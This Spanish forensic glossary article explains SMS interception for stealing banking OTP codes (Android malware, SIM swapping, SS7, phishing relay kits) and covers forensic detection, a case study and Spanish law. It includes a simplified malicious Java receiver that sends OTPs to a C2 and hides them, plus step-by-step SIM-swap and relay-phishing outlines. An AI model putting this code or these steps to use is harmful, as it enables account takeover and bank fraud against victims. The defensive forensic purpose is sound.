SMS Forwarding (Reenvío de SMS)
Técnica de interceptación de mensajes SMS mediante malware, SIM swapping o vulnerabilidades SS7 para capturar códigos OTP bancarios. Responsable del 53% de account takeovers en 2024, con pérdidas de 72 millones de dólares solo por SIM swap según el FBI.
SMS Forwarding (Reenvío de SMS)
1.055%. Ese fue el incremento de fraudes por SIM swap documentado en Reino Unido durante 2024, pasando de 289 a casi 3.000 casos en un solo año según Cifas. En España, el INCIBE gestionó 122.223 ciberincidentes en 2025 (+26%), con el smishing y la interceptación de SMS como vectores protagonistas. Detrás de cada cuenta bancaria vaciada, de cada wallet cripto robada, hay un código OTP de 6 dígitos que nunca llegó al destinatario legítimo.
Definicion tecnica
SMS Forwarding (reenvío de SMS) engloba el conjunto de técnicas que permiten a un atacante interceptar, redirigir o copiar mensajes SMS destinados a la víctima, especialmente códigos OTP (One-Time Password) utilizados como segundo factor de autenticación (2FA) en banca online, exchanges de criptomonedas y servicios digitales.
Vectores principales de interceptación SMS:
| Vector | Complejidad | Coste atacante | Volumen victimas |
|---|---|---|---|
| Malware Android (READ_SMS) | Baja | 50-200 euros/mes (MaaS) | Masivo (miles) |
| SIM Swapping | Media | 500-3.000 euros/operacion | Individual (targeted) |
| Vulnerabilidad SS7 | Alta | 5.000-100.000 euros equipo | Selectivo (decenas) |
| Phishing en tiempo real | Media | 200-1.000 euros/kit | Masivo (cientos) |
| Insider operadora | Variable | Soborno empleado | Individual |
Diferencia clave:
- Phishing clásico: Engaña al usuario para que entregue credenciales estáticas
- SMS Forwarding: Intercepta códigos dinámicos OTP en tránsito, permitiendo bypass completo de 2FA
Como funciona la interceptacion de SMS
Metodo 1: Malware Android con permisos SMS
El método más común y accesible. El malware solicita permisos READ_SMS, RECEIVE_SMS y SEND_SMS durante la instalación.
- Infeccion: Víctima instala APK malicioso distribuido vía WhatsApp, Telegram o smishing
- Permisos: App solicita acceso a SMS con excusa como “verificación de seguridad necesaria”
- Intercepcion silenciosa: Malware registra BroadcastReceiver con prioridad máxima para interceptar SMS entrantes
- Exfiltracion: Código OTP se envía al servidor C2 del atacante en milisegundos
- Borrado: SMS original se elimina o se oculta para que la víctima no lo vea
- Uso inmediato: Atacante introduce OTP en sesión bancaria ya iniciada con credenciales robadas
// Ejemplo simplificado: BroadcastReceiver malicioso para SMS
// NOTA: Código con fines educativos/forenses
public class SmsInterceptor extends BroadcastReceiver {
@Override
public void onReceive(Context context, Intent intent) {
Bundle bundle = intent.getExtras();
SmsMessage[] msgs = Telephony.Sms.Intents
.getMessagesFromIntent(intent);
for (SmsMessage sms : msgs) {
String cuerpo = sms.getMessageBody();
// Busca patrones OTP: 6 digitos, "codigo", "code"
if (cuerpo.matches(".*\\d{6}.*") ||
cuerpo.toLowerCase().contains("codigo")) {
// Envia al servidor C2
enviarAlC2(sms.getOriginatingAddress(), cuerpo);
// Aborta broadcast: usuario NO ve el SMS
abortBroadcast();
}
}
}
}Metodo 2: SIM Swapping
Ataque dirigido donde el delincuente suplanta la identidad de la víctima ante la operadora de telefonía para transferir su número a una nueva tarjeta SIM.
- Reconocimiento: Atacante recopila datos personales de la víctima (nombre, DNI, direccion, email) via redes sociales, filtraciones de datos o ingenieria social
- Contacto con operadora: Llama al servicio al cliente de la operadora simulando ser la víctima o acude a tienda física con documentación falsificada
- Solicitud de duplicado: Alega pérdida o robo del móvil y solicita nueva SIM con el mismo numero
- Activacion nueva SIM: La operadora activa la nueva SIM y desactiva la original. La víctima pierde cobertura
- Recepcion de SMS: Todos los SMS destinados al numero de la víctima llegan ahora al dispositivo del atacante
- Vaciado de cuentas: Atacante inicia sesión en banca online con credenciales previamente obtenidas y confirma con los OTP interceptados
SIM swap: la víctima pierde cobertura
La señal más clara de un SIM swap en curso es la pérdida repentina de cobertura móvil sin explicación. Si tu teléfono muestra “Sin servicio” o “Solo llamadas de emergencia” inesperadamente, contacta inmediatamente con tu operadora y tu banco. Cada minuto cuenta.
Metodo 3: Vulnerabilidades del protocolo SS7
SS7 (Signalling System 7) es el protocolo de señalización utilizado por operadoras de telecomunicaciones desde los años 80 para enrutar llamadas y SMS entre redes. Contiene vulnerabilidades de diseño que permiten a atacantes con acceso a la red de señalización interceptar SMS.
Ataques SS7 documentados:
| Ataque | Funcion SS7 abusada | Resultado |
|---|---|---|
| SendRoutingInfoForSM | Solicita ruta de entrega SMS | Redirige SMS a otro destino |
| UpdateLocation | Actualiza ubicacion del suscriptor | Registra al atacante como destino temporal |
| RegisterSS | Registra servicio suplementario | Activa desvío de llamadas y SMS |
Accesibilidad: En 2024, investigadores documentaron la venta de acceso a vulnerabilidades SS7 desde 5.000 dólares en foros de la dark web, según MobileIDWorld.
Limitaciones: Requiere acceso a la red SS7 (normalmente mediante operadoras pequeñas comprometidas o acceso ilícito a equipos de señalización). Es el método más sofisticado y menos frecuente, pero también el más difícil de detectar por la víctima.
Metodo 4: Phishing en tiempo real (relay kits)
Kits de phishing modernos que actúan como proxy entre la víctima y el sitio legítimo del banco, capturando credenciales y códigos OTP en tiempo real.
- El usuario recibe SMS phishing con enlace a web falsa del banco
- Introduce credenciales en el sitio falso
- El kit de phishing inicia sesión automáticamente en el banco real
- Banco envía OTP al teléfono del usuario
- Kit solicita al usuario el OTP recibido
- Usuario introduce OTP en web falsa; kit lo usa inmediatamente en sesión real
- Transferencia completada antes de que expire el código (30-60 segundos)
Estadísticas y datos del impacto
Datos globales 2024-2025
- FBI IC3 2024: 982 denuncias de SIM swap con perdidas de 25,98 millones de dolares en EE.UU.
- FBI 2022: Más de 72 millones de dolares robados via SIM swap (2.026 denuncias)
- Cifas (Reino Unido): Aumento del 1.055% en SIM swaps no autorizados en 2024 (de 289 a casi 3.000 casos)
- IDCARE (Australia): Incremento del 240% en consultas por SIM swap en 2024, 90% sin intervencion de la víctima
- T-Mobile: Condenada a pagar 33 millones de dolares en arbitraje tras SIM swap que vació wallet cripto (marzo 2025)
Datos España (INCIBE 2025)
- 122.223 ciberincidentes gestionados (+26% vs 2024)
- 25.133 incidentes de phishing (más del 50% del fraude online)
- 47% de usuarios contactados por INCIBE habían recibido intentos de phishing, vishing o smishing
- Múltiples alertas INCIBE sobre campañas de smishing suplantando bancos, AEMET y Hacienda
Regulación internacional: fin del SMS OTP
Múltiples reguladores están eliminando el SMS como factor de autenticación:
- India (RBI): Mandato de migrar a autenticación multifactor avanzada antes de abril 2026
- Emiratos Árabes (CBUAE): Eliminación obligatoria de SMS OTP en banca antes de marzo 2026
- NIST (EE.UU.): Desde 2017 desaconseja SMS como 2FA en la guía SP 800-63B
El fin del SMS como segundo factor
La tendencia regulatoria global apunta a la desaparicion del SMS OTP en banca. India y Emiratos Árabes ya han fijado plazos obligatorios para 2026. España y la UE aún no han establecido plazos concretos, pero la Directiva PSD3 (en tramitación) contempla requisitos de autenticación más estrictos que podrían excluir el SMS como factor válido.
Analisis forense de interceptacion SMS
1. Extraccion de evidencia SMS
# Extraer base de datos SMS del dispositivo (requiere root o backup)
adb pull /data/data/com.android.providers.telephony/databases/mmssms.db
# Alternativa: backup ADB (no requiere root)
adb backup -f sms_backup.ab com.android.providers.telephony
# Analizar con SQLite
sqlite3 mmssms.db
> SELECT date, address, body, read, seen FROM sms
WHERE body LIKE '%codigo%' OR body LIKE '%OTP%'
ORDER BY date DESC;2. Detectar malware con permisos SMS
# Listar apps con permisos SMS
adb shell dumpsys package | grep -B 10 "READ_SMS"
adb shell dumpsys package | grep -B 10 "RECEIVE_SMS"
# Verificar BroadcastReceivers registrados para SMS
adb shell dumpsys activity broadcasts | grep "SMS_RECEIVED"
# Comprobar prioridad de receivers (malware usa prioridad alta)
adb shell dumpsys package [paquete_sospechoso] | grep "priority"3. Detectar SIM swap
Indicadores forenses en el dispositivo:
| Indicador | Donde buscar | Significado |
|---|---|---|
| Perdida de red repentina | Logs de radio (logcat -b radio) | SIM desactivada por operadora |
| Cambio de ICCID | getprop gsm.sim.iccid | Nueva SIM activada |
| SMS no recibidos | Base de datos SMS (gap temporal) | Período de interceptación |
| Llamadas fallidas | Call log database | Red no disponible |
4. Detectar interceptación SS7
La detección de ataques SS7 requiere colaboración con la operadora de telecomunicaciones:
# Solicitar a operadora registros de señalizacion:
# - UpdateLocation requests para el numero afectado
# - SendRoutingInfoForSM desde nodos externos
# - Registros de desvio de llamadas/SMS activos
# - Logs de HLR (Home Location Register)5. Timeline forense completo
| Timestamp | Evento | Fuente evidencia |
|---|---|---|
| T+0:00 | Credenciales robadas (phishing/malware) | Historial navegador, APK |
| T+0:05 | Atacante solicita SIM swap / malware activo | Registros operadora / logs ADB |
| T+0:15 | Víctima pierde cobertura (SIM swap) | Logs radio dispositivo |
| T+0:16 | OTP bancario enviado al numero | Registros operadora SMS-C |
| T+0:17 | OTP recibido por atacante | Imposible en dispositivo víctima |
| T+0:18 | Login bancario con OTP interceptado | Logs banco (IP, User-Agent) |
| T+0:20 | Transferencia ejecutada | Extracto bancario |
| T+1:00 | Víctima detecta falta de cobertura | Declaracion víctima |
Caso de estudio: SIM swap bancario en España
Nota: Caso basado en patrones documentados por jurisprudencia española y alertas INCIBE. Datos personales anonimizados para proteger la confidencialidad.
Contexto
Víctima residente en Madrid recibe llamada de supuesto operador de Movistar informando de “problemas técnicos con su línea”. Le solicitan confirmación de datos personales (nombre completo, DNI, dirección). Horas después, su teléfono pierde cobertura.
Secuencia del ataque
- Reconocimiento previo: Atacante obtiene credenciales bancarias de la víctima mediante phishing bancario por email (semanas antes)
- Ingenieria social: Llamada a víctima simulando ser operadora para confirmar datos personales
- SIM swap: Atacante acude a tienda de operadora con documentación falsificada y solicita duplicado de SIM
- Activacion: Nueva SIM activada a las 19:42h. Víctima pierde cobertura inmediatamente
- Acceso bancario: Atacante inicia sesión en banca online con credenciales previamente robadas (19:48h)
- Interceptacion OTP: Banco envía SMS con código OTP que llega al dispositivo del atacante (19:49h)
- Transferencias: Tres transferencias de 4.900 euros cada una a cuentas mula (19:50-19:55h). Importes por debajo del umbral de 5.000 euros para alertas reforzadas
- Deteccion: Víctima intenta llamar a las 20:30h y descubre que no tiene cobertura. Llama desde otro teléfono a operadora y banco
Evidencia forense recuperada
- Logs de radio del dispositivo: Pérdida de señal registrada a las 19:42h
- Base de datos SMS: Gap de mensajes entre 19:42h y 21:15h (cuando se restauró la SIM)
- Registros operadora: Solicitud de duplicado SIM en tienda física (CCTV disponible)
- Registros banco: Login desde IP no habitual + User-Agent diferente + geolocalización inconsistente
Resultado
- Informe pericial demostró sofisticación del ataque y ausencia de negligencia del usuario
- Banco reembolsó 14.700 euros (100%) tras reclamación con informe forense
- Denuncia ante Policía Nacional (Grupo de Delitos Tecnológicos)
Marco legal español
Delitos tipificados
Código Penal español:
Art. 197.1 CP - Interceptación de comunicaciones
- “El que para descubrir los secretos o vulnerar la intimidad de otro, sin su consentimiento, se apodere de sus papeles, cartas, mensajes de correo electrónico o cualesquiera otros documentos o efectos personales, intercepte sus telecomunicaciones…”
- Pena: 1-4 años de prisión + multa 12-24 meses
- Aplicacion directa: La interceptación de SMS OTP constituye interceptación de telecomunicaciones
Art. 197.2 CP - Acceso a datos reservados
- Interceptar transmisiones de datos informáticos
- Pena: 3-5 años de prisión (si datos especialmente protegidos: bancarios)
Art. 248 CP - Estafa
- Manipulación informática para obtener transferencia patrimonial
- Pena: 6 meses-3 años; agravante si supera 50.000 euros
Art. 399 bis CP - Falsificación de tarjetas y documentos
- Aplicable a SIM swap con documentación falsificada
- Pena: 2-5 años de prisión
Jurisprudencia SIM swap
La jurisprudencia española está consolidando la responsabilidad de las operadoras en casos de SIM swap:
- Las consecuencias penales del SIM swapping incluyen estafa agravada (Art. 248-250 CP) e interceptación de comunicaciones (Art. 197 CP)
- Los tribunales tienden a considerar que la operadora es responsable subsidiaria cuando no verifica adecuadamente la identidad del solicitante del duplicado
Constitucion y secreto de comunicaciones
El Art. 18.3 de la Constitución Española garantiza el secreto de las comunicaciones. La interceptación de SMS, por cualquier medio (malware, SIM swap, SS7), vulnera este derecho fundamental. Solo puede ser limitado mediante resolución judicial motivada conforme a los Arts. 588 ter a-i de la LECrim.
Herramientas de proteccion y deteccion
Para usuarios
| Medida | Efectividad | Implementacion |
|---|---|---|
| Migrar a app authenticator (Google Authenticator, Authy) | Alta | Cambiar 2FA de SMS a app en banca online |
| PIN de seguridad en operadora | Media-Alta | Solicitar PIN para cambios de SIM |
| Alertas de consumo en operadora | Media | Configurar notificaciones de cambios en la línea |
| No publicar telefono en redes sociales | Media | Reducir superficie de ataque para SIM swap |
| Llaves de seguridad FIDO2/WebAuthn | Muy Alta | Hardware keys (YubiKey, Titan) |
Para analistas forenses
- Cellebrite UFED: Extracción de bases de datos SMS eliminados
- Oxygen Forensics: Análisis detallado de SMS con metadatos
- Magnet AXIOM: Correlación temporal de eventos SMS con actividad de red
- Wireshark: Análisis de tráfico red para detectar exfiltración de SMS por malware
- SQLite Browser: Análisis manual de
mmssms.db
Preguntas frecuentes
¿Es seguro usar SMS como segundo factor de autenticación?
No. El SMS es el método de 2FA más vulnerable. NIST lo desaconseja desde 2017. Es vulnerable a SIM swap, malware Android, ataques SS7 y phishing en tiempo real. Siempre que sea posible, migra a una app authenticator (Google Authenticator, Authy) o llaves FIDO2. Si tu banco solo ofrece SMS, solicita formalmente que implementen alternativas más seguras.
¿Cómo puedo saber si he sufrido un SIM swap?
La señal más inmediata es la pérdida repentina de cobertura móvil. Si tu teléfono muestra “Sin servicio” sin explicación, llama inmediatamente a tu operadora desde otro teléfono. Otras señales incluyen: no recibir SMS esperados, recibir notificaciones de cambio de contraseña que no solicitaste, o detectar movimientos bancarios no autorizados. El tiempo de reacción es crítico: los atacantes ejecutan las transferencias en los primeros 15-30 minutos.
¿Puede un perito informático demostrar que hubo interceptación de SMS?
Sí. El análisis forense puede demostrar: (1) presencia de malware con permisos SMS en el dispositivo, (2) gap temporal en la base de datos de SMS coincidente con el fraude, (3) pérdida de señal registrada en logs de radio indicativa de SIM swap, y (4) correlación temporal entre la interceptación del OTP y la transacción fraudulenta. Este informe pericial es determinante para que el banco reembolse el importe defraudado.
¿Qué responsabilidad tiene la operadora en un caso de SIM swap?
La operadora tiene obligación de verificar la identidad del solicitante antes de emitir un duplicado de SIM. Si se demuestra que la verificación fue insuficiente (aceptó documentación falsificada, no solicitó verificación adicional), puede ser declarada responsable subsidiaria. En España, varios tribunales han condenado a operadoras por negligencia en la verificación de identidad en casos de SIM swap.
Conceptos relacionados
- Troyano bancario: Malware que intercepta SMS OTP como parte del ataque
- Overlay attack: Técnica complementaria al SMS forwarding para robo de credenciales
- Análisis de phishing: El phishing en tiempo real utiliza SMS forwarding para bypass de 2FA
- Cadena de custodia: Esencial para la admisibilidad de evidencia SMS en juicio
- Análisis forense de malware: Análisis de APKs que interceptan SMS
Referencias y fuentes
FBI IC3. (2024). “Internet Crime Report 2024”. Disponible en: ic3.gov
- 982 denuncias SIM swap, pérdidas de 25,98 millones de dólares en 2024
FBI IC3. (2022). “Criminals Increasing SIM Swap Schemes”. Disponible en: ic3.gov
- Más de 72 millones de dólares robados via SIM swap
Cifas (UK). (2024). “Fraud Prevention Report”. Citado en: deepstrike.io
- Aumento del 1.055% en SIM swaps no autorizados (289 a 3.000 casos)
IDCARE (Australia). (2024). “SIM Swap and Phone Porting Report”. Citado en: coinlaw.io
- Incremento del 240% en consultas, 90% sin intervención de víctima
INCIBE. (2026). “Balance de ciberseguridad 2025”. Disponible en: incibe.es
- 122.223 ciberincidentes (+26%), 25.133 phishing, 47% usuarios afectados por smishing
INCIBE. (2025). “Campaña de smishing suplantando entidades bancarias”. Disponible en: incibe.es
- Alertas activas sobre smishing bancario en España
P1 Security. (2025). “SMS-Based Attacks in Mobile Networks”. Disponible en: p1sec.com
- Análisis técnico de ataques SS7, SIGTRAN y Diameter sobre SMS
MobileIDWorld. (2024). “SS7 Protocol Vulnerability Being Sold for $5,000”. Disponible en: mobileidworld.com
- Venta de exploits SS7 desde 5.000 dólares en dark web
Keepnet Labs. (2025). “What is SIM Swap Fraud”. Disponible en: keepnetlabs.com
- T-Mobile condenada a pagar 33 millones tras SIM swap (marzo 2025)
NIST. (2017). “SP 800-63B: Digital Identity Guidelines”. Disponible en: nist.gov
- SMS desaconsejado como factor de autenticación desde 2017
Código Penal español: Arts. 197 (interceptación comunicaciones), 248 (estafa), 399 bis (falsificación)
Constitución Española: Art. 18.3 (secreto de las comunicaciones)
LECrim: Arts. 588 ter a-i (intervención de comunicaciones electrónicas)
Ultima actualizacion: 12 Febrero 2026 Categoria: Ciberataques (CIB-012) Nivel tecnico: Intermedio-Avanzado Relevancia: Muy Alta (vector principal de bypass 2FA bancaria 2025-2026)
¿Necesitas un peritaje forense?
Si necesitas ayuda profesional con análisis forense digital, estoy aquí para ayudarte.
Solicitar Consulta Gratuita